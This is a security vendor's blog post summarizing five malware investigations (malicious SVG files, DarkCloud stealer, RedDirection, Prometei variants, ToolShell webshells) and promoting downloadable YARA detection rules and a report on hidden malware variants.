Security teams don’t just need alerts, they need answers. At Stairwell, we’ve seen how easily malware evades detection when defenders rely solely on behavior, logs, or static IOCs. Some threats hide inside image files. Others remain dormant for months. Many are missed not because they’re advanced, but because no one was looking in the right place.
This post walks through five recent investigations where we uncovered malware hiding in plain sight. Each summary includes what you’ll learn, what the threat looks like, and a YARA rule you can use to detect it in your own environment.
Are Your SVGs Malicious?
Attackers are embedding malicious JavaScript inside SVG files to deliver payloads in phishing campaigns and dropper chains. These files often look benign and pass through traditional scanners without raising flags because they’re treated like static images.
In this blog, we break down how attackers abuse SVG formatting, how these files behave once deployed, and what makes them difficult to detect with standard tooling. You’ll learn how to hunt them using static traits and file structure analysis.
Download the YARA rule to detect malicious SVG payloads
DarkCloud Stealer
DarkCloud is a stealthy info-stealer that targets Chromium-based browsers. It avoids detection by staying dormant, exfiltrating data quietly, and disguising itself as legitimate software. Behavior-based tools miss it because the file never needs to detonate.
This blog covers how the malware operates, how we identified it through file characteristics, and how defenders can catch it before it activates. You’ll also get a rule that searches for dormant DarkCloud samples already present on disk.
Download the YARA rule to detect DarkCloud variants
RedDirection
RedDirection is a persistent adversary that reuses its tooling across multiple campaigns. The filenames and hashes may change, but the structure and logic of the malware remain consistent. That consistency makes it detectable.
The blog outlines how we tracked RedDirection’s operations through reused loader components and artifacts. You’ll learn how to identify these toolkits using pattern-based YARA logic that holds even when the threat is repackaged.
Download the YARA rule to detect RedDirection artifacts
Prometei Evolves
Prometei is a modular botnet that continues to evolve. After analyzing a published threat report, we identified 53 previously unseen variants and five new hashes not included in the original write-up. These were uncovered through variant-aware analysis and continuous file reprocessing.
In this blog, we walk through the variant discovery process and explain how to use our YARA rules and hashes to go back and find what traditional tools missed. This is retroactive detection that scales.
Download 3 YARA rules to detect Prometei variants and 5 missed hashes
ToolShell
ToolShell is a suite of webshell malware that hides inside legitimate-looking web activity. It’s designed to blend in with everyday traffic and persists by abusing common file paths and content types. Most tools miss it because there’s nothing overtly malicious about the behavior.
This blog explains how ToolShell operates and how we used static detection to fingerprint core components. The included rule focuses on structural attributes that persist across variants, allowing defenders to detect ToolShell even in heavily obfuscated forms.
Download the YARA rule to detect ToolShell webshell variants
Why This Matters
If there is one consistent theme across these cases, it is this: most of the threats were already present in the environment. They were not missed because they were advanced. They were missed because defenders relied on point-in-time signals like alerts, logs, or execution behavior. Those signals only tell part of the story. The rest lives in the files themselves.
The Hidden Malware Report
To understand how common this gap is, we published The Hidden Malware Report. The report analyzes 769 public threat reports published between March 2023 and July 2025. Across those reports, 10,262 malware hashes were shared. Using those as a starting point, Stairwell uncovered an additional 16,104 malware variants through continuous reanalysis. That represents a 157% increase in detection coverage beyond what was publicly disclosed. The report also includes a curated set of 1,006 hashes that defenders can download to begin their own variant hunting.
Download the full report to see how your coverage stacks up
